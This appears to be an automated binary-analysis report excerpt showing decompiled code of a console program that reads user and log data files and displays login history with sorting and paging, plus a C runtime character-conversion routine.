						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
						_t270 = E012B82C0( *((intOrPtr*)(_t433 - 0x10)) + _t181);
						_t448 = _t435 + 0xc;
						__eflags = _t270 - 0xa;
						if(__eflags < 0) {
							_t336 =  *(_t433 - 8) * 0x45;
							__eflags = _t336;
							_t185 = _t336 + 0x22; // 0x23
							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
							E012B16A0(_t397, _t421, _t457);
						}
						L72:
						E012B12B0(9,  *(_t433 - 0xc) + 0xa);
						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
						_push("%s\t\t%s\t%s\t\t%s");
						E012B715C(_t314, _t397, _t421, __eflags);
						_t435 = _t448 + 0x14;
						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
							L74:
							goto L0;
						} else {
							L73:
							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
						}
						L75:
						_t322 =  *((char*)(_t433 - 1));
						__eflags =  *((char*)(_t433 - 1)) - 0x53;
						if( *((char*)(_t433 - 1)) == 0x53) {
							L77:
							 *(_t433 - 0x34) = 1;
						} else {
							L76:
							__eflags =  *((char*)(_t433 - 1)) - 0x73;
							if( *((char*)(_t433 - 1)) == 0x73) {
								goto L77;
							}
						}
						L78:
						__eflags =  *((char*)(_t433 - 1)) - 0x20;
						if( *((char*)(_t433 - 1)) == 0x20) {
							_t322 =  *(_t433 - 8);
							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
								 *(_t433 - 0x1c) = 0;
							}
						}
						L81:
						__eflags =  *((char*)(_t433 - 1)) - 0x53;
						if(__eflags == 0) {
							L50:
							E012B20E0(_t322, _t397, _t421, __eflags, _t457);
							__eflags =  *(_t433 - 0x14) - 0xc;
							if(__eflags >= 0) {
								E012B12B0(0xf, 0x15);
								_push("Press SPACE BAR to view more data");
								E012B715C(_t314, _t397, _t421, __eflags);
								_t446 = _t435 + 4;
							} else {
								E012B12B0(8, 0x15);
								_push("Press S to toggle Sorting between ascending or descending order.");
								E012B715C(_t314, _t397, _t421, __eflags);
								_t446 = _t435 + 4;
							}
							L53:
							E012B12B0(5, 8);
							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
							E012B715C(_t314, _t397, _t421, __eflags);
							_t435 = _t446 + 4;
							E012B12B0(4, 9);
							 *(_t433 - 8) = 0;
							while(1) {
								L55:
								__eflags =  *(_t433 - 8) - 0x46;
								if(__eflags >= 0) {
									break;
								}
								L56:
								_push(0xc4);
								_push("%c");
								E012B715C(_t314, _t397, _t421, __eflags);
								_t435 = _t435 + 8;
								L54:
								_t287 = 1 +  *(_t433 - 8);
								__eflags = _t287;
								 *(_t433 - 8) = _t287;
							}
							L57:
							__eflags =  *(_t433 - 0x34);
							if( *(_t433 - 0x34) != 0) {
								L58:
								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
								while(1) {
									L60:
									__eflags =  *(_t433 - 8);
									if( *(_t433 - 8) < 0) {
										break;
									}
									L61:
									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
									_t435 = _t435 + 0xc;
									_t397 = _t421 + 0x22;
									asm("movsb");
									L59:
									_t371 =  *(_t433 - 8) - 1;
									__eflags = _t371;
									 *(_t433 - 8) = _t371;
								}
								L62:
								 *(_t433 - 8) = 0;
								while(1) {
									L64:
									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
										goto L66;
									}
									L65:
									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
									_t435 = _t435 + 0xc;
									_t397 = _t421 + 0x22;
									asm("movsb");
									L63:
									_t283 = 1 +  *(_t433 - 8);
									__eflags = _t283;
									 *(_t433 - 8) = _t283;
								}
							}
							L66:
							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
								 *(_t433 - 0x1c) = 0;
							}
							L68:
							 *(_t433 - 8) =  *(_t433 - 0x1c);
							 *(_t433 - 0xc) = 0;
							L69:
							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
							if(__eflags < 0) {
							}
							goto L75;
						}
						L82:
						_t249 =  *((char*)(_t433 - 1));
						__eflags = _t249 - 0x73;
						if(__eflags == 0) {
							goto L50;
						}
						L83:
						_t322 =  *((char*)(_t433 - 1));
						__eflags =  *((char*)(_t433 - 1)) - 0x20;
						if(__eflags == 0) {
							goto L50;
						}
						L84:
						while(1) {
							L86:
							__eflags = 1;
							if(1 == 0) {
								break;
							}
							L1:
							 *(_t433 - 8) = 0;
							 *(_t433 - 0x28) = 0;
							 *(_t433 - 0x1c) = 0;
							 *(_t433 - 0x34) = 0;
							_t218 = E012B6EF1("LOG.DAT", "r");
							_t436 = _t435 + 8;
							 *0x12d2f20 = _t218;
							while(1) {
								L2:
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
								_t320 =  *0x12d2f20; // 0x0
								_t228 = E012B7021(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
								_t437 = _t436 + 0x18;
								if(_t228 == 0xffffffff) {
									break;
								}
								L3:
								_t307 = E012B6EF1("USER.DAT", "r");
								_t450 = _t437 + 8;
								 *0x12d2f28 = _t307;
								while(1) {
									L4:
									_push(_t433 - 0x78);
									_push(_t433 - 0x58);
									_t394 =  *0x12d2f28; // 0x0
									_t309 = E012B7021(_t394, "%s %s %s\n", _t433 - 0x38);
									_t451 = _t450 + 0x14;
									if(_t309 == 0xffffffff) {
										break;
									}
									L5:
									_t313 = E012B8230( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
									_t450 = _t451 + 8;
									if(_t313 == 0) {
										 *(_t433 - 8) = 1 +  *(_t433 - 8);
									}
								}
								L8:
								_t310 =  *0x12d2f28; // 0x0
								_push(_t310);
								E012B6DB6(_t314, _t397, _t421, __eflags);
								_t436 = _t451 + 4;
							}
							L9:
							 *(_t433 - 0x30) =  *(_t433 - 8);
							_t364 =  *0x12d2f20; // 0x0
							_push(_t364);
							E012B6DB6(_t314, _t397, _t421, __eflags);
							E012B20E0( *(_t433 - 8), _t397, _t421, __eflags, _t457);
							E012B12B0(0x1e, 8);
							_push("1. View by USER NAME");
							E012B715C(_t314, _t397, _t421, __eflags);
							E012B12B0(0x1e, 0xa);
							_push("2. View by DATE");
							E012B715C(_t314, _t397, _t421, __eflags);
							E012B12B0(0x1e, 0xc);
							_push("3. View ALL User history");
							E012B715C(_t314, _t397, _t421, __eflags);
							E012B12B0(0x1e, 0xe);
							_push("4. Return to main menu");
							E012B715C(_t314, _t397, _t421, __eflags);
							_t442 = _t437 + 0x14;
							E012B12B0(1, 0xf);
							 *(_t433 - 8) = 0;
							while(1) {
								L11:
								__eflags =  *(_t433 - 8) - 0x4e;
								if(__eflags >= 0) {
									break;
								}
								L12:
								_push("_");
								E012B715C(_t314, _t397, _t421, __eflags);
								_t442 = _t442 + 4;
								_t306 = 1 +  *(_t433 - 8);
								__eflags = _t306;
								 *(_t433 - 8) = _t306;
							}
							L13:
							E012B12B0(0x17, 0x11);
							_push(" Press a number between the range [1 -4]  ");
							E012B715C(_t314, _t397, _t421, __eflags);
							_t443 = _t442 + 4;
							 *(_t433 - 0xc) = 0;
							_t322 =  *(_t433 - 0xc);
							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
							E012B20E0( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
							__eflags =  *(_t433 - 0x20) - 3;
							if(__eflags > 0) {
								L38:
								E012B20E0(_t322, _t397, _t421, __eflags, _t457);
								E012B12B0(0xa, 0xa);
								_push("Your input is out of range! Enter a choice between 1 to 4!");
								E012B715C(_t314, _t397, _t421, __eflags);
								E012B12B0(0xf, 0xc);
								_push("Press ENTER to return to main menu...");
								_t249 = E012B715C(_t314, _t397, _t421, __eflags);
								_t435 = _t443 + 8;
								 *(_t433 - 0x28) = 1;
								goto L39;
							} else {
								L14:
								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M012B35F8))) {
									case 0:
										L15:
										E012B12B0(0x1e, 0xa);
										_push("Enter user name : ");
										E012B715C(_t314, _t397, _t421, __eflags);
										_t365 = _t433 - 0x58;
										_t249 = E012B738B(" %s", _t433 - 0x58);
										_t435 = _t443 + 0xc;
										 *(_t433 - 8) = 0;
										while(1) {
											L17:
											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
												break;
											}
											L18:
											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
											_t299 = E012B8230( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
											_t435 = _t435 + 8;
											__eflags = _t299;
											if(_t299 == 0) {
												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												_t303 = 1 +  *(_t433 - 0xc);
												__eflags = _t303;
												 *(_t433 - 0xc) = _t303;
											}
											_t249 = 1 +  *(_t433 - 8);
											__eflags = _t249;
											 *(_t433 - 8) = _t249;
										}
										L21:
										_t322 =  *(_t433 - 0xc);
										 *(_t433 - 0x14) =  *(_t433 - 0xc);
										goto L39;
									case 1:
										do {
											L22:
											__eax = E012B12B0(0x1e, 0xa);
											_push("Enter Date (dd/mm/yyyy) : ");
											__eax = E012B715C(__ebx, __edi, __esi, __eflags);
											__esp = __esp + 4;
											__edx = __ebp - 0x58;
											E012B738B(" %s", __ebp - 0x58) = __ebp - 0x58;
											__eflags = E012B1E60(__eflags, __ebp - 0x58);
											if(__eflags == 0) {
												__eax = E012B1500(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
												_push(0x12cf8b0);
												__eax = E012B715C(__ebx, __edi, __esi, __eflags);
												__esp = __esp + 4;
											}
											__ecx = __ebp - 0x58;
											__eflags = E012B1E60(__eflags, __ebp - 0x58);
										} while (__eflags == 0);
										__edx = __ebp - 0x58;
										_push(__ebp - 0x58);
										__eax = E012B15D0();
										 *(__ebp - 8) = 0;
										 *(__ebp - 0xc) = 0;
										while(1) {
											L27:
											__ecx =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L28:
											__edx = __ebp - 0x58;
											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
											__ecx =  *(__ebp - 0x18);
											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
											__eax = E012B8230( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
											__eflags = __eax;
											if(__eax == 0) {
												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
												__ecx = 0x11;
												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
												__edi = __esi + __ecx;
												__edi = __esi + __ecx + __ecx;
												__ecx = 0;
												asm("movsb");
												__eax =  *(__ebp - 0xc);
												__eax = 1 +  *(__ebp - 0xc);
												__eflags = __eax;
												 *(__ebp - 0xc) = __eax;
											}
											__eax =  *(__ebp - 8);
											__eax = 1 +  *(__ebp - 8);
											__eflags = __eax;
											 *(__ebp - 8) = __eax;
										}
										L31:
										__ecx =  *(__ebp - 0xc);
										 *(__ebp - 0x14) = __ecx;
										goto L39;
									case 2:
										L32:
										 *(__ebp - 8) = 0;
										while(1) {
											L34:
											__eax =  *(__ebp - 8);
											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
												break;
											}
											L35:
											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
											__ecx = 0x11;
											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
											__edi = __esi + __ecx;
											__edi = __esi + __ecx + __ecx;
											__ecx = 0;
											asm("movsb");
											__ecx =  *(__ebp - 0xc);
											__ecx = 1 +  *(__ebp - 0xc);
											 *(__ebp - 0xc) = __ecx;
											__edx =  *(__ebp - 8);
											__edx = 1 +  *(__ebp - 8);
											__eflags = __edx;
											 *(__ebp - 8) = __edx;
										}
										L36:
										__edx =  *(__ebp - 0xc);
										 *(__ebp - 0x14) =  *(__ebp - 0xc);
										L39:
										__eflags =  *(_t433 - 0x14);
										if(__eflags == 0) {
											E012B20E0(_t322, _t397, _t421, __eflags, _t457);
											E012B12B0(0x1b, 0xc);
											_push(0x12cf918);
											E012B715C(_t314, _t397, _t421, __eflags);
											_t435 = _t435 + 4;
											_t249 = E012B2E80(_t314, _t365, __eflags, _t457);
										}
										__eflags =  *(_t433 - 0x28);
										if( *(_t433 - 0x28) != 0) {
											L85:
											 *(_t433 - 0x28) = 0;
										} else {
											L42:
											 *(_t433 - 8) = 0;
											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
											while(1) {
												L44:
												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
													break;
												}
												L45:
												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												_t322 = 1 +  *(_t433 - 8);
												 *(_t433 - 8) = 1 +  *(_t433 - 8);
												_t391 =  *(_t433 - 0xc) - 1;
												__eflags = _t391;
												 *(_t433 - 0xc) = _t391;
											}
											L46:
											 *(_t433 - 8) = 0;
											while(1) {
												L48:
												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
												if(__eflags >= 0) {
													goto L50;
												}
												L49:
												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
												_t435 = _t435 + 0xc;
												_t397 = _t421 + 0x22;
												asm("movsb");
												L47:
												_t322 = 1 +  *(_t433 - 8);
												__eflags = _t322;
												 *(_t433 - 8) = _t322;
											}
											goto L50;
										}
										goto L86;
									case 3:
										L37:
										goto L87;
								}
							}
							break;
						}
						L87:
						return _t249;
						L88:
					}
				}
			}

0x012b347b
0x012b347b
0x012b347b
0x012b347b
0x012b347b
0x012b347b
0x012b347b
0x012b3481
0x012b348a
0x012b348d
0x012b348d
0x012b3490
0x012b3493
0x012b3493
0x012b3499
0x012b34a2
0x012b34ad
0x012b34ae
0x012b34b3
0x012b34cc
0x012b34e2
0x012b34f0
0x012b34f5
0x012b34fa
0x012b34fd
0x012b3500
0x012b3505
0x012b3505
0x012b350b
0x012b350f
0x012b3510
0x012b3510
0x012b3515
0x012b351e
0x012b352c
0x012b3530
0x012b353a
0x012b353e
0x012b3548
0x012b354c
0x012b3556
0x012b355a
0x012b355b
0x012b3560
0x012b3565
0x012b356e
0x012b3571
0x012b357e
0x00000000
0x012b3573
0x012b3573
0x012b3579
0x012b3579
0x012b3583
0x012b3583
0x012b3587
0x012b358a
0x012b3595
0x012b3595
0x012b358c
0x012b358c
0x012b3590
0x012b3593
0x00000000
0x00000000
0x012b3593
0x012b359c
0x012b35a0
0x012b35a3
0x012b35a5
0x012b35a8
0x012b35ab
0x012b35ad
0x012b35ad
0x012b35ab
0x012b35b4
0x012b35b8
0x012b35bb
0x012b3361
0x012b3361
0x012b3366
0x012b336a
0x012b3388
0x012b338d
0x012b3392
0x012b3397
0x012b336c
0x012b3370
0x012b3375
0x012b337a
0x012b337f
0x012b337f
0x012b339a
0x012b339e
0x012b33a3
0x012b33a8
0x012b33ad
0x012b33b4
0x012b33b9
0x012b33cb
0x012b33cb
0x012b33cb
0x012b33cf
0x00000000
0x00000000
0x012b33d1
0x012b33d1
0x012b33d6
0x012b33db
0x012b33e0
0x012b33c2
0x012b33c5
0x012b33c5
0x012b33c8
0x012b33c8
0x012b33e5
0x012b33e5
0x012b33e9
0x012b33eb
0x012b33f1
0x012b33ff
0x012b33ff
0x012b33ff
0x012b3403
0x00000000
0x00000000
0x012b3405
0x012b340b
0x012b3422
0x012b3422
0x012b3422
0x012b3424
0x012b33f6
0x012b33f9
0x012b33f9
0x012b33fc
0x012b33fc
0x012b3427
0x012b3427
0x012b3439
0x012b3439
0x012b343c
0x012b343f
0x00000000
0x00000000
0x012b3441
0x012b3447
0x012b3458
0x012b3458
0x012b3458
0x012b345a
0x012b3430
0x012b3433
0x012b3433
0x012b3436
0x012b3436
0x012b3439
0x012b345d
0x012b3460
0x012b3463
0x012b3465
0x012b3465
0x012b346c
0x012b346f
0x012b3472
0x012b348d
0x012b3490
0x012b3493
0x012b3493
0x00000000
0x012b3493
0x012b35c1
0x012b35c1
0x012b35c5
0x012b35c8
0x00000000
0x00000000
0x012b35ce
0x012b35ce
0x012b35d2
0x012b35d5
0x00000000
0x00000000
0x012b35db
0x012b35e4
0x012b35e4
0x012b35e9
0x012b35eb
0x00000000
0x00000000
0x012b2ee9
0x012b2ee9
0x012b2ef0
0x012b2ef7
0x012b2efe
0x012b2f0f
0x012b2f14
0x012b2f17
0x012b2f1c
0x012b2f1c
0x012b2f29
0x012b2f37
0x012b2f45
0x012b2f55
0x012b2f5c
0x012b2f61
0x012b2f67
0x00000000
0x00000000
0x012b2f69
0x012b2f73
0x012b2f78
0x012b2f7b
0x012b2f80
0x012b2f80
0x012b2f83
0x012b2f87
0x012b2f91
0x012b2f98
0x012b2f9d
0x012b2fa3
0x00000000
0x00000000
0x012b2fa5
0x012b2fb3
0x012b2fb8
0x012b2fbd
0x012b2fc5
0x012b2fc5
0x012b2fc8
0x012b2fca
0x012b2fca
0x012b2fcf
0x012b2fd0
0x012b2fd5
0x012b2fd5
0x012b2fdd
0x012b2fe0
0x012b2fe3
0x012b2fe9
0x012b2fea
0x012b2ff2
0x012b2ffb
0x012b3000
0x012b3005
0x012b3011
0x012b3016
0x012b301b
0x012b3027
0x012b302c
0x012b3031
0x012b303d
0x012b3042
0x012b3047
0x012b304c
0x012b3053
0x012b3058
0x012b306a
0x012b306a
0x012b306a
0x012b306e
0x00000000
0x00000000
0x012b3070
0x012b3070
0x012b3075
0x012b307a
0x012b3064
0x012b3064
0x012b3067
0x012b3067
0x012b307f
0x012b3083
0x012b3088
0x012b308d
0x012b3092
0x012b3095
0x012b309c
0x012b309f
0x012b30a2
0x012b30ab
0x012b30b4
0x012b30b7
0x012b30bb
0x012b327b
0x012b327b
0x012b3284
0x012b3289
0x012b328e
0x012b329a
0x012b329f
0x012b32a4
0x012b32a9
0x012b32ac
0x00000000
0x012b30c1
0x012b30c1
0x012b30c4
0x00000000
0x012b30cb
0x012b30cf
0x012b30d4
0x012b30d9
0x012b30e1
0x012b30ea
0x012b30ef
0x012b30f2
0x012b3104
0x012b3104
0x012b3107
0x012b310a
0x00000000
0x00000000
0x012b310c
0x012b3119
0x012b311e
0x012b3123
0x012b3126
0x012b3128
0x012b3130
0x012b3141
0x012b3141
0x012b3141
0x012b3143
0x012b3147
0x012b3147
0x012b314a
0x012b314a
0x012b30fe
0x012b30fe
0x012b3101
0x012b3101
0x012b314f
0x012b314f
0x012b3152
0x00000000
0x00000000
0x012b315a
0x012b315a
0x012b315e
0x012b3163
0x012b3168
0x012b316d
0x012b3170
0x012b3181
0x012b318a
0x012b318c
0x012b3196
0x012b319b
0x012b31a0
0x012b31a5
0x012b31a5
0x012b31a8
0x012b31b1
0x012b31b1
0x012b31b5
0x012b31b8
0x012b31b9
0x012b31be
0x012b31c5
0x012b31d7
0x012b31d7
0x012b31d7
0x012b31da
0x012b31dd
0x00000000
0x00000000
0x012b31df
0x012b31df
0x012b31e6
0x012b31e9
0x012b31ec
0x012b31f1
0x012b31f9
0x012b31fb
0x012b3200
0x012b3203
0x012b3209
0x012b320c
0x012b320f
0x012b3214
0x012b3214
0x012b3214
0x012b3214
0x012b3216
0x012b3217
0x012b321a
0x012b321a
0x012b321d
0x012b321d
0x012b31ce
0x012b31d1
0x012b31d1
0x012b31d4
0x012b31d4
0x012b3222
0x012b3222
0x012b3225
0x00000000
0x00000000
0x012b322d
0x012b322d
0x012b323f
0x012b323f
0x012b323f
0x012b3242
0x012b3245
0x00000000
0x00000000
0x012b3247
0x012b324a
0x012b324d
0x012b3253
0x012b3256
0x012b3259
0x012b325e
0x012b325e
0x012b325e
0x012b325e
0x012b3260
0x012b3261
0x012b3264
0x012b3267
0x012b3236
0x012b3239
0x012b3239
0x012b323c
0x012b323c
0x012b326c
0x012b326c
0x012b326f
0x012b32b3
0x012b32b3
0x012b32b7
0x012b32b9
0x012b32c2
0x012b32c7
0x012b32cc
0x012b32d1
0x012b32d4
0x012b32d4
0x012b32d9
0x012b32dd
0x012b35dd
0x012b35dd
0x012b32e3
0x012b32e3
0x012b32e3
0x012b32f0
0x012b3307
0x012b3307
0x012b330a
0x012b330d
0x00000000
0x00000000
0x012b330f
0x012b3315
0x012b3326
0x012b3326
0x012b3326
0x012b3328
0x012b32f8
0x012b32fb
0x012b3301
0x012b3301
0x012b3304
0x012b3304
0x012b332b
0x012b332b
0x012b333d
0x012b333d
0x012b3340
0x012b3343
0x00000000
0x00000000
0x012b3345
0x012b334b
0x012b335c
0x012b335c
0x012b335c
0x012b335e
0x012b3334
0x012b3337
0x012b3337
0x012b333a
0x012b333a
0x00000000
0x012b333d
0x00000000
0x00000000
0x012b3274
0x00000000
0x00000000
0x012b30c4
0x00000000
0x012b30bb
0x012b35f1
0x012b35f6
0x00000000
0x012b35f6
0x012b348d

APIs

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B34B3
_wprintf.LIBCMT ref: 012B3560

Strings

%d., xrefs: 012B34AE
%s%s%s%s, xrefs: 012B355B

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$ConsoleCursorHandlePosition
String ID: %d.$%s%s%s%s
API String ID: 3459578117-4028964860
Opcode ID: 77a5ac3b844cfe09d167274e5dfe16135f264499b082f04a2df9ed44b6a5bd00
Instruction ID: 3b8b7a954b676ffe6bd366fad449bf3f2ee8b569495e42e32a9332115d2cc95b
Opcode Fuzzy Hash: 77a5ac3b844cfe09d167274e5dfe16135f264499b082f04a2df9ed44b6a5bd00
Instruction Fuzzy Hash: 5D417EB1E1404BAFCF1CCB88D9D0AFEBB76FF95344F558199D101AB246DA30AA45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 012C1673, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E012C1673(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				signed int _v20;
				void* __edi;
				signed int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				void* _t57;
				signed int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					_push(_t57);
					E012B7857( &_v20, _t57, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E012C124B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t28 = _v20 + 4; // 0x20432f41
							__eflags = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E012B8EFF(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							_t20 = _t59 + 0x74; // 0x3a202020
							__eflags = _t50 -  *_t20;
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t22 = _t59 + 0x74; // 0x3a202020
							_t59 =  *_t22;
							goto L21;
						}
						_t12 = _t59 + 0x74; // 0x3a202020
						__eflags = _t50 -  *_t12;
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t17 = _t59 + 0x74; // 0x3a202020
						_t18 = _t59 + 4; // 0x20432f41
						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x012c167b
0x012c1680
0x012c169a
0x00000000
0x012c169a
0x012c1682
0x012c1687
0x00000000
0x00000000
0x012c168c
0x012c16a0
0x012c16a7
0x012c16ac
0x012c16af
0x012c16b6
0x012c16d5
0x012c16dc
0x012c16de
0x012c1722
0x012c172a
0x012c1736
0x012c173f
0x012c1741
0x012c1751
0x012c1751
0x012c1755
0x012c1757
0x012c175a
0x012c175a
0x012c175a
0x012c175a
0x00000000
0x012c1760
0x012c1743
0x012c1743
0x012c1748
0x012c1748
0x012c174b
0x00000000
0x012c174b
0x012c16e0
0x012c16e3
0x012c16e7
0x012c1710
0x012c1710
0x012c1710
0x012c1713
0x012c1713
0x00000000
0x00000000
0x012c1715
0x012c1719
0x00000000
0x00000000
0x012c171b
0x012c171b
0x012c171b
0x00000000
0x012c171b
0x012c16e9
0x012c16e9
0x012c16ec
0x00000000
0x00000000
0x012c16f0
0x012c16fa
0x012c1700
0x012c1703
0x012c1709
0x012c170c
0x012c170e
0x00000000
0x00000000
0x00000000
0x012c170e
0x012c16b8
0x012c16bb
0x012c16bd
0x012c16c2
0x012c16c2
0x012c16c7
0x00000000
0x012c16c7
0x012c168e
0x012c1693
0x012c1697
0x012c1697
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 012C16A7
__isleadbyte_l.LIBCMT ref: 012C16D5
MultiByteToWideChar.KERNEL32(20432F41,00000009,?,3A202020,00000000,00000000,?,00000000,?,?,012CFF04,?,00000000), ref: 012C1703
